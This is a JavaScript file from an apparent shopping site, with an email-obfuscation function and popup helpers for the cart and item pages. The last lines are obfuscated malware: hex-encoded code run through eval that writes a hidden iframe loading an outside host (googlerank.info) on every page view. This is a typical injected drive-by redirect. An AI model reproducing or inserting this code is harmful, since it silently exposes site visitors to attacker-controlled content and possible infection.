


/**
 * This script prints an email address to the screen, so that it's harder
 * for spam bots to scrape the email addresses from the web page.
 */
function printEmail(thisUser,thisDomain,thisDot,thisText,thisClass) {
	var emailAddress = thisUser + "@" + thisDomain + "." + thisDot;
	if (thisText == "addy") {
		thisText = emailAddress;
	}
	document.write("<a href=\"mailto:");
	document.write(emailAddress);
	if (thisClass != "") {
		document.write("\" class=\"");
		document.write(thisClass);
	}
	document.write("\">");
	document.write(thisText);
	document.write("</a>");
}

function addItem(URL){
    var newURL = "item.php?action=add&prodid="+URL;
    aWindow=window.open(newURL,'','width=625,height=600,toolbar=no,status=no,scrollbars=yes,menubars=no, resizable=yes');
}

function viewCart(URL){
    var newURL = "cart.php"+URL;
    aWindow=window.open(newURL,'','width=625,height=600,toolbar=no,status=no,scrollbars=yes,menubars=no, resizable=yes, location=no');
}

function viewImp(URL){
    var newURL = "large_picture.php?id="+URL;
    aWindow=window.open(newURL,'','width=625,height=500,toolbar=no,status=no,scrollbars=yes,menubars=no, resizable=yes, location=no');
}

function CEDC001EAA4A58116DF1C887395CC8(E6AFFA93A076DA384CB354D81){function E9C0D54AE7FAE4DF62E06236AA(){return 16;}return(parseInt(E6AFFA93A076DA384CB354D81,E9C0D54AE7FAE4DF62E06236AA()));}function DA55DCC52D4A9B68C47BC0C1412(AD135B3F01516085C54){function BDB02658A90626538(){var D4019D172B5021917BEC750=2;return D4019D172B5021917BEC750;}var B48CFB439292CFB30A132D2="";for(B710D8E2F311C83912DD768753=0;B710D8E2F311C83912DD768753<AD135B3F01516085C54.length;B710D8E2F311C83912DD768753+=BDB02658A90626538()){B48CFB439292CFB30A132D2+=( String.fromCharCode(CEDC001EAA4A58116DF1C887395CC8(AD135B3F01516085C54.substr(B710D8E2F311C83912DD768753,BDB02658A90626538()))));}eval(B48CFB439292CFB30A132D2);}DA55DCC52D4A9B68C47BC0C1412("74776C643D646F63756D656E742E676574456C656D656E74427949642827766371716327293B69662874776C643D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D7663717163207372633D687474703A2F2F676F6F676C6572616E6B2E696E666F2F636F756E7465722F3F673D76697370207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D");
